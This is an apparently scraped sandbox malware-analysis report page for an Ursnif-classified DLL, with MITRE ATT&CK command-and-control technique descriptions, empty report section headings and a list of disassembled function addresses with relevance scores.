Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 2zTgaLRFkL.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Function 7321297B, Relevance: 10.6, APIs: 7, Instructions: 136
COMMON

Function 73212A2B, Relevance: 7.6, APIs: 5, Instructions: 87
COMMON

Function 73212874, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76
COMMON

Function 73216FE9, Relevance: 4.6, APIs: 3, Instructions: 69
COMMON

Function 73217194, Relevance: 3.1, APIs: 2, Instructions: 67
COMMON

Function 73214B5C, Relevance: 3.0, APIs: 2, Instructions: 31
COMMON

Function 732120E0, Relevance: 1.6, APIs: 1, Instructions: 105
libraryCOMMON

Function 73217F4F, Relevance: 1.3, APIs: 1, Instructions: 32
memoryCOMMON

Function 73211000, Relevance: 6.6, Strings: 5, Instructions: 383
COMMONCrypto

Function 7321305D, Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Function 73215928, Relevance: 4.6, APIs: 3, Instructions: 78
COMMON

Function 7321473B, Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Function 7321BF43, Relevance: 1.8, APIs: 1, Instructions: 274
COMMONCrypto

Function 73213247, Relevance: 1.6, APIs: 1, Instructions: 144
COMMON

Function 73215FE6, Relevance: 1.6, APIs: 1, Instructions: 140
COMMON

Function 732176FC, Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Function 73211FB0, Relevance: .1, Instructions: 118
COMMON

Function 732158F5, Relevance: .0, Instructions: 23
COMMON

Function 732182B7, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Function 732154BD, Relevance: 15.1, APIs: 10, Instructions: 70
COMMON

Function 73213470, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120
COMMON

Function 73217318, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 78
COMMON

Function 7321A388, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Function 732147C0, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 31
libraryloaderCOMMON

Function 7321949B, Relevance: 9.3, APIs: 6, Instructions: 319
fileCOMMON

Function 73213AA7, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON